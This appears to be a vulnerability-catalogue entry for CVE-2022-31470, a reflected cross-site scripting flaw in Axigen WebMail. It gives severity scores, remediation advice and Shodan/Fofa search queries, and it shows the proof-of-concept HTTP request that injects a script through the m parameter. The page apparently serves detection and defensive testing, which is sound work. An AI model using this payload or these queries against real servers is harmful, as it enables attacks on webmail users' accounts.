🔙 목록으로 돌아가기

CVE-2022-31470: Axigen WebMail - Cross-Site Scripting

TitleAxigen WebMail - Cross-Site Scripting
AuthorAmirZargham
SeverityMedium
ImpactAttackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account.
RemediationUpdate Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m parameter.
CVSS Score6.1
EPSS Score0.25054
CVE IDCVE-2022-31470
CWE IDCWE-79
Shodan Querytitle:"Axigen"
Fofa Querytitle="Axigen"
Tags cve cve2022 axigen webmail xss vuln

🔍 Vulnerability Description

Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /index.hsp?m=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31470.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31470.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A